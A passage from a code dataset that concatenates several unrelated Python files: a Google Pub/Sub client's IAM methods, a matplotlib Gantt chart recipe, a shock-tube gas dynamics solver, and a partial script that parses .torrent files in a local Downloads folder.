(),\n ) -> policy.Policy:\n r\"\"\"Gets the IAM access control policy for a function.\n Returns an empty policy if the function exists and does\n not have a policy set.\n Args:\n request (:class:`~.iam_policy.GetIamPolicyRequest`):\n The request object. Request message for `GetIamPolicy`\n method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.policy.Policy:\n Defines an Identity and Access Management (IAM) policy.\n It is used to specify access control policies for Cloud\n Platform resources.\n A ``Policy`` is a collection of ``bindings``. A\n ``binding`` binds one or more ``members`` to a single\n ``role``. Members can be user accounts, service\n accounts, Google groups, and domains (such as G Suite).\n A ``role`` is a named list of permissions (defined by\n IAM or configured by users). 
A ``binding`` can\n optionally specify a ``condition``, which is a logic\n expression that further constrains the role binding\n based on attributes about the request and/or target\n resource.\n **JSON Example**\n ::\n {\n \"bindings\": [\n {\n \"role\": \"roles/resourcemanager.organizationAdmin\",\n \"members\": [\n \"user:mike@example.com\",\n \"group:admins@example.com\",\n \"domain:google.com\",\n \"serviceAccount:my-project-id@appspot.gserviceaccount.com\"\n ]\n },\n {\n \"role\": \"roles/resourcemanager.organizationViewer\",\n \"members\": [\"user:eve@example.com\"],\n \"condition\": {\n \"title\": \"expirable access\",\n \"description\": \"Does not grant access after Sep 2020\",\n \"expression\": \"request.time <\n timestamp('2020-10-01T00:00:00.000Z')\",\n }\n }\n ]\n }\n **YAML Example**\n ::\n bindings:\n - members:\n - user:mike@example.com\n - group:admins@example.com\n - domain:google.com\n - serviceAccount:my-project-id@appspot.gserviceaccount.com\n role: roles/resourcemanager.organizationAdmin\n - members:\n - user:eve@example.com\n role: roles/resourcemanager.organizationViewer\n condition:\n title: expirable access\n description: Does not grant access after Sep 2020\n expression: request.time < timestamp('2020-10-01T00:00:00.000Z')\n For a description of IAM and its features, see the `IAM\n developer's\n guide `__.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.GetIamPolicyRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.get_iam_policy,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n def test_iam_permissions(\n self,\n request: iam_policy.TestIamPermissionsRequest = None,\n *,\n retry: retries.Retry = gapic_v1.method.DEFAULT,\n timeout: float = None,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> iam_policy.TestIamPermissionsResponse:\n r\"\"\"Tests the specified permissions against the IAM access control\n policy for a function. If the function does not exist, this will\n return an empty set of permissions, not a NOT_FOUND error.\n Args:\n request (:class:`~.iam_policy.TestIamPermissionsRequest`):\n The request object. 
Request message for\n `TestIamPermissions` method.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n Returns:\n ~.iam_policy.TestIamPermissionsResponse:\n Response message for ``TestIamPermissions`` method.\n \"\"\"\n # Create or coerce a protobuf request object.\n\n # The request isn't a proto-plus wrapped type,\n # so it must be constructed via keyword expansion.\n if isinstance(request, dict):\n request = iam_policy.TestIamPermissionsRequest(**request)\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method.wrap_method(\n self._transport.test_iam_permissions,\n default_timeout=None,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"resource\", request.resource),)),\n )\n\n # Send the request.\n response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)\n\n # Done; return the response.\n return response\n\n\ntry:\n DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n client_library_version=pkg_resources.get_distribution(\n \"google-cloud-pubsub\",\n ).version,\n )\nexcept pkg_resources.DistributionNotFound:\n DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()\n\n\n__all__ = (\"SchemaServiceClient\",)\n","repo_name":"google-cloud-sdk-unofficial/google-cloud-sdk","sub_path":"lib/third_party/google/pubsub_v1/services/schema_service/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":43591,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"35928013224","text":"from datetime import datetime\nimport sys\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\nimport matplotlib.dates as mdates\n\nimport logging\n\n\nclass Gantt(object):\n '''\n Simple Gantt renderer.\n Uses *matplotlib* rendering capabilities.\n '''\n\n # Red Yellow Green diverging colormap\n # from http://colorbrewer2.org/\n RdYlGr = ['#d73027', '#f46d43', '#fdae61',\n '#fee08b', '#ffffbf', '#d9ef8b',\n '#a6d96a', '#66bd63', '#1a9850']\n\n POS_START = 1.0\n POS_STEP = 0.5\n\n def __init__(self, tasks):\n self._fig = plt.figure()\n self._ax = self._fig.add_axes([0.1, 0.1, .75, .5])\n\n self.tasks = tasks[::-1]\n\n def _format_date(self, date_string):\n '''\n Formats string representation of *date_string* into *matplotlib.dates*\n instance.\n '''\n try:\n date = datetime.strptime(date_string, '%Y-%m-%d %H:%M:%S')\n except ValueError as err:\n logging.error(\"String '{0}' can not be converted to datetime object: {1}\"\n .format(date_string, err))\n sys.exit(-1)\n mpl_date = mdates.date2num(date)\n return mpl_date\n\n def _plot_bars(self):\n '''\n Processes each task and adds *barh* to the current *self._ax* (*axes*).\n '''\n i = 0\n for task in self.tasks:\n start = self._format_date(task['start'])\n end = self._format_date(task['end'])\n bottom = (i * Gantt.POS_STEP) + Gantt.POS_START\n width = end - start\n self._ax.barh(bottom, width, left=start, height=0.3,\n align='center', label=task['label'],\n color = Gantt.RdYlGr[i])\n i += 1\n\n def _configure_yaxis(self):\n '''y axis'''\n task_labels = [t['label'] for t in self.tasks]\n pos = 
self._positions(len(task_labels))\n ylocs = self._ax.set_yticks(pos)\n ylabels = self._ax.set_yticklabels(task_labels)\n plt.setp(ylabels, size='medium')\n\n def _configure_xaxis(self):\n ''''x axis'''\n # make x axis date axis\n self._ax.xaxis_date()\n\n # format date to ticks on every 7 days\n rule = mdates.rrulewrapper(mdates.DAILY, interval=7)\n loc = mdates.RRuleLocator(rule)\n formatter = mdates.DateFormatter(\"%d %b\")\n\n self._ax.xaxis.set_major_locator(loc)\n self._ax.xaxis.set_major_formatter(formatter)\n xlabels = self._ax.get_xticklabels()\n plt.setp(xlabels, rotation=30, fontsize=9)\n\n def _configure_figure(self):\n self._configure_xaxis()\n self._configure_yaxis()\n\n self._ax.grid(True, color='gray')\n self._set_legend()\n self._fig.autofmt_xdate()\n\n def _set_legend(self):\n '''\n Tweak font to be small and place *legend*\n in the upper right corner of the figure\n '''\n font = font_manager.FontProperties(size='small')\n self._ax.legend(loc='upper right', prop=font)\n\n def _positions(self, count):\n '''\n For given *count* number of positions, get array for the positions.\n '''\n end = count * Gantt.POS_STEP + Gantt.POS_START\n pos = np.arange(Gantt.POS_START, end, Gantt.POS_STEP)\n return pos\n\n def show(self):\n self._plot_bars()\n self._configure_figure()\n plt.show()\n\n\nif __name__ == '__main__':\n TEST_DATA = (\n { 'label': 'Research', 'start':'2013-10-01 12:00:00', 'end': '2013-10-02 18:00:00'}, # @IgnorePep8\n { 'label': 'Compilation', 'start':'2013-10-02 09:00:00', 'end': '2013-10-02 12:00:00'}, # @IgnorePep8\n { 'label': 'Meeting #1', 'start':'2013-10-03 12:00:00', 'end': '2013-10-03 18:00:00'}, # @IgnorePep8\n { 'label': 'Design', 'start':'2013-10-04 09:00:00', 'end': '2013-10-10 13:00:00'}, # @IgnorePep8\n { 'label': 'Meeting #2', 'start':'2013-10-11 09:00:00', 'end': '2013-10-11 13:00:00'}, # @IgnorePep8\n { 'label': 'Implementation', 'start':'2013-10-12 09:00:00', 'end': '2013-10-22 13:00:00'}, # @IgnorePep8\n { 'label': 'Demo', 'start':'2013-10-23 09:00:00', 'end': '2013-10-23 13:00:00'}, # @IgnorePep8\n )\n\n gantt = Gantt(TEST_DATA)\n gantt.show()\n","repo_name":"igormilovanovic/python-data-viz-cookbook","sub_path":"3367OS_Code/3367OS_08_Code/ch08_rec04_gantt.py","file_name":"ch08_rec04_gantt.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"73"} +{"seq_id":"4506970496","text":"from FluidProperties.GasProperty import *\nfrom ArrayTable import ArrayTable\n\n\nclass Node:\n def __init__(self):\n self.p = self.T = self.rho = self.u = None\n self.e = self.e0 = self.k = None\n self.U = None\n\n def Uinit(self, u, p, T, AFAK=1.e8, A=1):\n # from GasProperty import Rg\n # from GasProperty import k_Justi\n self.p = p\n self.T = T\n self.rho = p / (Rg(AFAK) * T)\n self.u = u\n\n self.k = 1.4 # k_Justi(self.T, AFAK)\n self.e = self.p / self.rho / (self.k - 1.)\n self.e0 = self.e + self.u ** 2 / 2.\n self.h0 = self.e0 + self.p / self.rho\n self.a = pow(self.k * self.p / self.rho, 1. / 2.)\n\n from numpy import array\n self.U = array([self.rho * A, self.rho * self.u * A,\n (self.p / (self.k - 1) + 1. / 2. * self.rho * self.u ** 2) * A]).transpose()\n\n def characLine(self):\n self.lamda = self.a + (self.k - 1.) / 2. * self.u\n self.beta = self.a - (self.k - 1.) / 2. * self.u\n self.lamdaDirection = (self.k + 1) / 2. / (self.k - 1) * self.lamda - (3. - self.k) / 2. / (\n self.k - 1.) * self.beta\n self.betaDirection = (3. - self.k) / 2. / (self.k - 1.) 
* self.lamda - (self.k + 1) / 2. / (\n self.k - 1) * self.beta\n\n def solve(self, U=None, A=1, AFAK=1.e8):\n # from GasProperty import Rg\n # from GasProperty import k_Justi\n if U is None:\n U = self.U\n else:\n self.U = U\n\n self.rho = U[0] / A\n self.u = U[1] / U[0]\n self.e = U[2] / U[0] - 1. / 2. * pow(U[1] / U[0], 2)\n T = self.e * (1.4 - 1.) / Rg(AFAK)\n\n # def kite(T):\n # return self.e - Rg(AFAK) * T / (k_Justi(T, AFAK) - 1)\n #\n # h = 1.\n # while abs(kite(T)) > 1.e-5:\n # T -= kite(T) / ((kite(T + h) - kite(T - h)) / 2. / h)\n self.T = T\n self.k = k_Justi(T, AFAK)\n self.p = Rg(AFAK) * T * self.rho\n # print(\"T={}\".format(self.T))\n # print(\"p={}\".format(self.p))\n # print(\"r={}\".format(self.rho))\n\n def F(self, U=None):\n if U is None:\n U = self.U\n from numpy import array\n temp = pow(U[1], 2) / U[0]\n self.F = array([U[1], temp + (self.k - 1) * (U[2] - temp / 2),\n U[1] * (U[2] + (self.k - 1) * (U[2] - temp / 2)) / U[0]]).transpose()\n return self.F\n\n def Jaccobi(self, U=None):\n if U is None:\n self.solve()\n U = self.U\n k = self.k\n else:\n self.U = U\n self.solve()\n k = self.k\n import numpy as np\n result = np.zeros([3, 3])\n result[0][1] = 1.\n result[1][0] = (k - 3.) / 2. * (U[1] ** 2) / (U[0] ** 2)\n result[1][1] = (3. - k) * U[1] / U[0]\n result[1][2] = k - 1.\n result[2][0] = -k * U[2] * U[1] / (U[0] ** 2) + (k - 1.) * (U[1] ** 3) / (U[0] ** 3)\n result[2][1] = k * U[2] / U[0] - (k - 1.) * 3. / 2. * U[1] ** 2 / U[0] ** 2\n result[2][2] = k * U[1] / U[0]\n\n self.J = result\n self.Jeigenvalue, self.Jeigenvector = np.linalg.eig(self.J)\n return result\n\n def FVS(self):\n import numpy as np\n absA = np.dot(np.dot(self.Jeigenvector, np.diag(abs(self.Jeigenvalue))), np.linalg.inv(self.Jeigenvector))\n self.Jpositive = (self.J + absA) / 2.\n self.Jnagative = (self.J - absA) / 2.\n self.Fpositive = np.dot(self.Jpositive, self.U)\n self.Fnagative = np.dot(self.Jnagative, self.U)\n\n\ndef StegerWarmingFVS(t, left=[], right=[], xlim=None, numberOfNode=200, A=1):\n import numpy as np\n init = ArrayTable(2, 0)\n\n solution = AnalyticalSolution(t, left, right)\n if xlim is None:\n mindata = [min(solution.table[i].data) for i in range(solution.col)]\n maxdata = [max(solution.table[i].data) for i in range(solution.col)]\n xlim = [1.5 * mindata[0], 1.5 * maxdata[0]]\n print(xlim)\n deltax = (xlim[1] - xlim[0]) / numberOfNode\n\n for i in np.arange(xlim[0], xlim[1], deltax):\n Nodeex = Node()\n if i < 0:\n Nodeex.Uinit(left[0], left[2], left[1])\n else:\n Nodeex.Uinit(right[0], right[2], right[1])\n Nodeex.Jaccobi()\n Nodeex.FVS()\n init.append([i, Nodeex])\n\n thisstep = init\n tnow = 0\n Corant = 0.9\n\n while tnow < t:\n laststep = thisstep\n mm = 0\n for i in range(laststep.row):\n if max(abs(laststep.table[1].data[i].Jeigenvalue)) > mm:\n mm = max(abs(laststep.table[1].data[i].Jeigenvalue))\n\n deltat = deltax * Corant / mm\n print(deltat)\n thisstep = ArrayTable(2, 0)\n thisstep.append([laststep.table[0].data[0], laststep.table[1].data[0]])\n for i in range(1, laststep.row - 1):\n Uthis = laststep.table[1].data[i].U - deltat / deltax * (\n (laststep.table[1].data[i + 1].Fnagative - laststep.table[1].data[i].Fnagative) + (\n laststep.table[1].data[i].Fpositive - laststep.table[1].data[i - 1].Fpositive))\n Nodethis = Node()\n Nodethis.solve(Uthis)\n Nodethis.Jaccobi()\n Nodethis.FVS()\n thisstep.append([laststep.table[0].data[i], Nodethis])\n thisstep.append([laststep.table[0].data[-1], laststep.table[1].data[-1]])\n\n tnow += deltat\n 
print(\"tnow={}\".format(tnow))\n print(\"Row of table {}\".format(thisstep.row))\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n for i in range(thisstep.row):\n result.append([thisstep.table[0].data[i], thisstep.table[1].data[i].u, thisstep.table[1].data[i].rho,\n thisstep.table[1].data[i].p,\n thisstep.table[1].data[i].T])\n return result\n\n\ndef laxWendroff1step(t, left=[], right=[], xlim=None, numberOfNode=500, A=1):\n import numpy as np\n init = ArrayTable(2, 0)\n\n solution = AnalyticalSolution(t, left, right)\n if xlim is None:\n mindata = [min(solution.table[i].data) for i in range(solution.col)]\n maxdata = [max(solution.table[i].data) for i in range(solution.col)]\n xlim = [1.5 * mindata[0], 1.5 * maxdata[0]]\n print(xlim)\n deltax = (xlim[1] - xlim[0]) / numberOfNode\n\n for i in np.arange(xlim[0], xlim[1], deltax):\n Nodeex = Node()\n if i < 0:\n Nodeex.Uinit(left[0], left[2], left[1])\n else:\n Nodeex.Uinit(right[0], right[2], right[1])\n Nodeex.Jaccobi()\n Nodeex.F()\n init.append([i, Nodeex])\n\n thisstep = init\n tnow = 0\n Corant = 0.9\n\n while tnow < t:\n laststep = thisstep\n mm = 0\n for i in range(laststep.row):\n if max(abs(laststep.table[1].data[i].Jeigenvalue)) > mm:\n mm = max(abs(laststep.table[1].data[i].Jeigenvalue))\n\n deltat = deltax * Corant / mm\n print(deltat)\n thisstep = ArrayTable(2, 0)\n thisstep.append([laststep.table[0].data[0], laststep.table[1].data[0]])\n for i in range(1, laststep.row - 1):\n Aright=1./2.*(laststep.table[1].data[i].J+laststep.table[1].data[i+1].J)\n Aleft=1./2.*(laststep.table[1].data[i].J+laststep.table[1].data[i-1].J)\n Uthis = laststep.table[1].data[i].U\\\n - deltat /2./ deltax * (laststep.table[1].data[i + 1].F - laststep.table[1].data[i-1].F)\\\n + deltat**2 /2./ deltax**2*(np.dot(Aright,(laststep.table[1].data[i+1].F - laststep.table[1].data[i].F))\n -np.dot(Aleft,(laststep.table[1].data[i].F - laststep.table[1].data[i-1].F)))\n\n Nodethis = Node()\n Nodethis.solve(Uthis)\n Nodethis.Jaccobi()\n Nodethis.F()\n thisstep.append([laststep.table[0].data[i], Nodethis])\n thisstep.append([laststep.table[0].data[-1], laststep.table[1].data[-1]])\n\n tnow += deltat\n print(\"tnow={}\".format(tnow))\n print(\"Row of table {}\".format(thisstep.row))\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n for i in range(thisstep.row):\n result.append([thisstep.table[0].data[i], thisstep.table[1].data[i].u, thisstep.table[1].data[i].rho,\n thisstep.table[1].data[i].p,\n thisstep.table[1].data[i].T])\n return result\n\n\n\n# def FVS(A):\n# import numpy as np\n# eva, evec = np.linalg.eig(A)\n# absA = np.dot(np.dot(evec, np.diag(abs(eva))), np.linalg.inv(evec))\n# Apositive = (A + absA) / 2\n# Anagative = (A - absA) / 2\n# return Apositive, Anagative\n\n\ndef AnalyticalSolution(t, left=[], right=[], xlim=None):\n import math\n u1 = left[0]\n u2 = right[0]\n # r1 = left[1];\n # r2 = right[1]\n T1 = left[1]\n T2 = right[1]\n p1 = left[2]\n p2 = right[2]\n # T1 = p1 / r1 / Rg();\n # T2 = p2 / r2 / Rg()\n r1 = p1 / Rg() / T1\n r2 = p2 / Rg() / T2\n k1 = k_Justi(T1)\n k2 = k_Justi(T2)\n a1 = math.sqrt(k1 * p1 / r1)\n a2 = math.sqrt(k2 * p2 / r2)\n\n # print(\"-\" * 100)\n # print(\"{0:^50}|{1:^50}\".format(\"ul=%.5gm/s\" % u1, \"ur=%.5gm/s\" % u2))\n # 
print(\"{0:^50}|{1:^50}\".format(\"rhol=%.5gkg/m^3\" % r1, \"rhor=%.5gkg/m^3\" % r2))\n # print(\"{0:^50}|{1:^50}\".format(\"pl=%sPa\" % p1, \"pr=%sPa\" % p2))\n # print(\"{0:^50}|{1:^50}\".format(\"Tl=%sK\" % T1, \"Tr=%sK\" % T2))\n # print(\"-\" * 100)\n\n def function(pbar, pj, rhoj, gamma=1.4):\n if pbar == pj:\n return 0\n elif pbar > pj:\n import math\n aj = math.sqrt(gamma * pj / rhoj)\n return (pbar - pj) / rhoj / aj / math.sqrt((gamma + 1) / 2. / gamma * pbar / pj + (gamma - 1) / 2. / gamma)\n elif pbar < pj:\n import math\n aj = math.sqrt(gamma * pj / rhoj)\n return 2. * aj / (gamma - 1.) * (pow(pbar / pj, (gamma - 1) / 2. / gamma) - 1)\n\n def F(p):\n return function(p, p1, r1, k1) + function(p, p2, r2, k2)\n\n pbar = (p1 + p2) / 2\n h = 10.\n while abs(u1 - u2 - F(pbar)) > 1.e-5:\n pbar -= (u1 - u2 - F(pbar)) / ((-F(pbar + h) + F(pbar - h)) / 2. / h)\n # print(pbar)\n ubar = (u1 + u2 - function(pbar, p1, r1, k1) + function(pbar, p2, r2, k2)) / 2.\n # print(ubar)\n\n A1 = r1 * a1 * math.sqrt((k1 + 1.) / (2. * k1) * pbar / p1 + (k1 - 1) / 2. / k1)\n A2 = r2 * a2 * math.sqrt((k2 + 1.) / (2. * k2) * pbar / p2 + (k2 - 1) / 2. / k2)\n\n if pbar >= p1:\n Z1 = u1 - A1 / r1\n else:\n Z1 = u1 - a1\n\n if pbar >= p2:\n Z2 = u2 + A2 / r2\n else:\n Z2 = u2 + a2\n\n if pbar >= p1:\n Z1star = Z1\n elif pbar > 0:\n a1star = a1 + (k1 - 1) / 2. * (u1 - ubar)\n Z1star = ubar - a1star\n else:\n Z1star = u1 - 2. * a1 / (k1 - 1)\n\n if pbar >= p2:\n Z2star = Z2\n elif pbar > 0:\n a2star = a2 - (k2 - 1) / 2. * (u2 - ubar)\n Z2star = ubar + a2star\n else:\n Z2star = u2 + 2 * a2 / (k2 - 1)\n\n r1bar = r1 * A1 / (A1 - r1 * (u1 - ubar))\n r2bar = r2 * A2 / (A2 + r2 * (u2 - ubar))\n\n # print(\"Z1=\", Z1)\n # print(\"Z1star=\", Z1star)\n # print(\"ubar=\", ubar)\n # print(\"Z2star=\", Z2star)\n # print(\"Z2=\", Z2)\n\n if xlim is None:\n Zlaggest = abs(Z1) if abs(Z1) > abs(Z2) else abs(Z2)\n xlim = [-1.5 * t * Zlaggest, 1.5 * t * Zlaggest]\n\n # print(\"Will draw air state between [{},{}]\".format(xlim[0],xlim[1]))\n\n def fun(t, x):\n if x / t > Z2:\n return u2, r2, p2\n elif x / t < Z1:\n return u1, r1, p1\n elif Z1star < x / t < ubar:\n return ubar, r1bar, pbar\n elif ubar < x / t < Z2star:\n return ubar, r2bar, pbar\n elif Z1 < x / t < Z1star:\n a = (k1 - 1) / (k1 + 1) * (u1 - x / t) + 2 * a1 / (k1 + 1)\n u = x / t + a\n p = p1 * pow(a / a1, 2 * k1 / (k1 - 1))\n r = k1 * p / a / a\n return u, r, p\n elif Z2star < x / t < Z2:\n a = (k2 - 1) / (k2 + 1) * (x / t - u2) + 2 * a2 / (k2 - 1)\n u = x / t - a\n p = p2 * pow(a / a2, 2 * k2 / (k2 - 1))\n r = k2 * p / a / a\n return u, r, p\n\n result = ArrayTable(5, 0)\n result.setTableHeader([\"x\", \"Velocity\", \"Density\", \"Pressure\", \"Temperature\"])\n result.setTableUnit([\"m\", \"m/s\", \"kg/m^3\", \"Pa\", \"K\"])\n import numpy as np\n step = (xlim[1] - xlim[0]) / 1000.\n xx = np.arange(xlim[0], xlim[1], step)\n for each in xx:\n u, r, p = fun(t, each)\n result.append([each, u, r, p, p / r / Rg()])\n return result\n\n\nclass ShockTube:\n def __init__(self, left, right):\n self.left = left\n self.right = right\n import math\n u1 = left[0]\n u2 = right[0]\n # r1 = left[1];\n # r2 = right[1]\n T1 = left[1]\n T2 = right[1]\n p1 = left[2]\n p2 = right[2]\n # T1 = p1 / r1 / Rg();\n # T2 = p2 / r2 / Rg()\n r1 = p1 / Rg() / T1\n r2 = p2 / Rg() / T2\n k1 = k_Justi(T1)\n k2 = k_Justi(T2)\n a1 = math.sqrt(k1 * p1 / r1)\n a2 = math.sqrt(k2 * p2 / r2)\n\n print(\"-\" * 100)\n print(\"{0:^50}|{1:^50}\".format(\"ul=%.5gm/s\" % u1, \"ur=%.5gm/s\" % u2))\n 
print(\"{0:^50}|{1:^50}\".format(\"rhol=%.5gkg/m^3\" % r1, \"rhor=%.5gkg/m^3\" % r2))\n print(\"{0:^50}|{1:^50}\".format(\"pl=%sPa\" % p1, \"pr=%sPa\" % p2))\n print(\"{0:^50}|{1:^50}\".format(\"Tl=%sK\" % T1, \"Tr=%sK\" % T2))\n print(\"-\" * 100)\n\n def AnalyticalSolutionAnimation(self, t):\n import numpy as np\n import matplotlib.pyplot as plt\n from matplotlib.animation import FuncAnimation\n result = AnalyticalSolution(t, self.left, self.right)\n mindata = [min(result.table[i].data) for i in range(result.col)]\n maxdata = [max(result.table[i].data) for i in range(result.col)]\n fig = plt.figure(0, figsize=(10, 10))\n ax = list()\n ln = list()\n for i in range(4):\n ax.append(fig.add_subplot(4, 1, i + 1))\n plt.ylabel(result.table[i + 1].ColName + \"(\" + result.table[i + 1].ColUnit + \")\")\n temp, = ax[i].plot([], [], 'b-', animated=False)\n ln.append(temp)\n plt.xlabel(\"x(m)\")\n plt.tight_layout()\n\n def init():\n for i in range(4):\n ax[i].set_xlim(mindata[0], maxdata[0])\n ax[i].set_ylim(0.8 * mindata[i + 1], 1.05 * maxdata[i + 1])\n\n return ln[0], ln[1], ln[2], ln[3]\n\n def update(t):\n solution = AnalyticalSolution(t, self.left, self.right, [mindata[0], maxdata[0]])\n for i in range(4):\n ln[i].set_data(solution.table[0].data, solution.table[i + 1].data)\n\n return ln[0], ln[1], ln[2], ln[3]\n\n ani = FuncAnimation(fig, update, frames=np.linspace(1.e-12, t, 90), interval=100,\n init_func=init, blit=True, repeat=False)\n # ani.save(\"shocktube.gif\", writer=\"pillow\")\n plt.show()\n\n # if pbar<0:\n # print(\"Left and right waves will all be rarefaction waves and there exists vacuum between them\")\n # Z1=u1-a1\n # Z1star=u1+2*a1/(k1-1)\n # Z2=u2+a2\n # Z2star=u2-2*a2/(k2-1)\n # def fun(t,x):\n # if x/tx/t>Z1: #左行稀疏波波内\n # a=(k1-1)/(k1+1)*(u1-x/t)+2*a1/(k1+1)\n # u=x/t+a\n # p=p1*pow(a/a1,2*k1/(k1-1))\n # r=k1*p/a/a\n # return u,r,p\n # if x/t>Z2: #右行波波前\n # return u2,r2,p2\n # if Z2>x/t>Z2star: #右行稀疏波波内\n # a=(k2-1)/(k2+1)*(x/t-u2)+2*a2/(k2-1)\n # u=x/t-a\n # p=p2*pow(a/a2,2*k2/(k2-1))\n # r=k2*p/a/a\n # return u,r,p\n\n # if p2 >= p1:\n # if (u1 - u2) >= F(p2):\n # print(\"Left and right waves will all be shock waves\")\n # a1 = math.sqrt(k1 * r1 / p1)\n # A1 = r1 * a1 * math.sqrt((k1 + 1) / 2. / k1 * pbar / p1 + (k1 - 1) / 2. 
/ k1)\n # Z1 = u1 - A1 / r1\n # rho1bar = r1 * A1 / (A1 - r1 * (u1 - ubar))\n # a2=math.sqrt(k2*r2/p2)\n # A2=r2*a2*math.sqrt((k2+1)/2./k2*pbar/p2+(k2-1)/2./k2)\n # Z2=u2+A2/r2\n # rho2bar=r2*A2/(A2+r2*(u2-ubar))\n # def fun(t,x):\n # if Z1>x/t:\n # return u1,r1,p1\n # elif Z1 < x/t < ubar:\n # return ubar,rho1bar,pbar\n # elif x/t>Z2:\n # return u2,r2,p2\n # elif Z2 > x/t > ubar:\n # return ubar,rho2bar,pbar\n # elif (u1 - u2) >= F(p1):\n # print(\"left wave will be shock wave and right wave will be rarefaction wave\")\n #\n # elif (u1 - u2) >= F(0.):\n # print(\"Left and right waves will all be rarefaction waves\")\n # else:\n # print(\"Left and right waves will all be rarefaction waves and vacuum will between them\")\n # else:\n # if (u1 - u2) >= F(p1):\n # print(\"Left and right waves will all be shock waves\")\n # elif (u1 - u2) >= F(p2):\n # print(\"right wave will be shock wave and left wave will be rarefaction wave\")\n # elif (u1 - u2) >= F(0.):\n # print(\"Left and right waves will all be rarefaction waves\")\n # else:\n # print(\"Left and right waves will all be rarefaction waves and vacuum will between them\")\n def StegerWarmingFVSAnimation(self):\n pass\n\n\nif __name__==\"__main__\":\n # laxWendroff1step(0.6e-3,[1,1200,0.5e6],[0,300,0.1e6]).plot(1)\n ShockTube([1,1200,0.5e6],[0,300,0.1e6]).AnalyticalSolutionAnimation(0.6e-3)\n\n\n\nclass pipe1D:\n def __init__(self, pu, pd, Tu, Td):\n self.pu = pu\n self.pd = pd\n\n def boundaryCondition(self):\n pass\n","repo_name":"melan-thompson/pysmartengine","sub_path":"Pipe/ShockTube.py","file_name":"ShockTube.py","file_ext":"py","file_size_in_byte":18209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11887076877","text":"import os\nimport re\nimport time\nimport subprocess\n\n'''\nUseful links:\ntorrent file structure: https://fileformats.fandom.com/wiki/Torrent_file\nopen file with buffer for byte-read: http://www.djangospin.com/python-file-buffering/\nRegExp for byte search: https://stackoverflow.com/questions/31019854/typeerror-cant-use-a-string-pattern-on-a-bytes-like-object-in-re-findall\n'''\n\ndef main():\n startTimer = time.perf_counter()\n\n # Scan 'Downloads' folder for torrent files.\n # Store them in lstTorrentFiles[(path, file)]\n # dictTorrentFiles = {'torrentFileName': {'filePath':path, 'fileName':name}}\n dictTorrentFiles = {}\n reTorrentFile = re.compile('.+\\.torrent')\n for root, dirs, files in os.walk('C:/Users/test/Downloads'):\n for file in files:\n if reTorrentFile.match(file):\n dictTorrentFiles[file] = {}\n dictTorrentFiles[file]['filePath'] = root\n dictTorrentFiles[file]['fileName'] = file\n\n # Add some comments to check github\n # Loop through list of torrent files and extracts where it stores local files\n # add result to\n # dictTorrentFiles = {'torrentFileName': {'localFiles': file/dir}}\n # and\n # dictTorrentFiles = {'torrentFileName': {'singleFiles': true/false}}\n for torrentFile in dictTorrentFiles.keys():\n filePath, fileName = dictTorrentFiles[torrentFile]['filePath'], dictTorrentFiles[torrentFile]['fileName']\n\n # open file with buffer for byte search\n with open(f\"{filePath}/{fileName}\", buffering=5) as readFile:\n rawFileContent = readFile.buffer\n torrentHeader = rawFileContent.readline()\n\n # RegExp should be with rb\"mask\" for byte search\n reInfoD = re.search(rb\"infod(\\d+):\", torrentHeader)\n # Single file torrent - infod6:length (==6)\n # Multi files torrent - infod5:files (==5)\n 
dictTorrentFiles[torrentFile]['singleFile'] = reInfoD.group(1).decode('UTF-8') == \"6\"\n\n # Looking for a name in torrent file\n currentPos = reInfoD.span()[1]\n reNameD = re.search(rb\"4:name(\\d+):\", torrentHeader[currentPos::])\n nameLength = int(reNameD.group(1))\n\n currentPos += reNameD.span()[1]\n dictTorrentFiles[torrentFile]['localFiles'] = torrentHeader[currentPos:currentPos+nameLength].decode('UTF-8')\n\n # Searching local directories for download files\n # reDownloadedFile = re.compile(rf\"{dictTorrentFiles[torrentFile]['localFiles']}\")\n for root, dirs, files in os.walk('C:/Users/test/Downloads'):\n if dictTorrentFiles[torrentFile]['singleFile'] == False:\n for dir in dirs:\n if dictTorrentFiles[torrentFile]['localFiles']==dir:\n dictTorrentFiles[torrentFile]['downloadedFiles'] = root + '/' + dir\n else:\n for file in files:\n if dictTorrentFiles[torrentFile]['localFiles']==file:\n 